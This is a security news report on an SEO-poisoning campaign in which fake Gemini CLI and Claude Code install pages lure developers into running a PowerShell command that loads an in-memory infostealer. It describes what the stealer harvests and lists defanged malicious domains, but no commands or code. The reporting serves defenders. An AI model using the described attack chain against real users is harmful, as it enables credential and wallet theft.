Fake Gemini and Claude Code Sites Spread Infostealers Through SEO Poisoning
SEO poisoning campaigns are using fake websites impersonating Google Gemini and Anthropic Claude Code to distribute infostealer malware targeting enterprise credentials and crypto wallets.
Security researchers at EclecticIQ have uncovered a malicious campaign in which threat actors created fake websites posing as Google Gemini's coding tool and Anthropic's Claude Code to deliver information-stealing malware. The campaign, first flagged by independent researcher @g0njxa on April 21, 2026, uses SEO poisoning to rank malicious domains above legitimate results, luring developers searching for AI coding tools.
The attackers began registering domains in early March 2026, using top-level domains like .co.uk, .us.com, and .us.org to target users in the US and UK. The fake sites mimic official installation pages for Gemini CLI and Claude Code, prompting victims to copy and paste a PowerShell command into their terminal. This command downloads a downloader payload from attacker-controlled infrastructure, which then executes an infostealer entirely in memory.
Once executed, the infostealer targets Windows endpoints and harvests credentials, session cookies, autofill data, and form history from Chromium-based browsers (Chrome, Edge, Brave) and Firefox. It also extracts data from enterprise collaboration platforms including Slack, Microsoft Teams, Discord, Mattermost, Zoom, Telegram Desktop, LiveChat, Notion, and Zoho Mail Desktop. EclecticIQ noted that a single session cookie or local state key from these platforms grants authenticated access to the victim's workspace, including internal channels and shared files.
The malware's collection scope extends to remote access tools, OpenVPN configuration files, cryptocurrency wallets (Brave Wallet, Spectre), cloud storage services (Proton Drive, iCloud Drive, Google Drive, MEGA, OneDrive), and general user files and system metadata. It also allows attackers to perform arbitrary remote code execution, enabling hands-on-keyboard intrusions against selected victims.
The Gemini CLI attack chain begins when victims visit geminicli[.]co[.]com, which displays a fake installation page. The PowerShell command downloads the payload from gemini-setup[.]com, and the infostealer exfiltrates data to C2 server events[.]msft23[.]com. For Claude Code, the attackers registered claudecode[.]co[.]com and claude-setup[.]com on March 30, using a similar pattern with C2 server events[.]ms709[.]com. The similarities between both attack chains strongly suggest a single threat actor is behind both campaigns.
EclecticIQ assessed that the campaign is geographically tailored to target US and UK users, given the choice of TLDs. The infostealer's deliberate focus on enterprise users and developer workstations highlights the growing threat of SEO poisoning as a vector for delivering sophisticated malware. Organizations should educate developers to verify download sources and avoid executing commands from untrusted websites.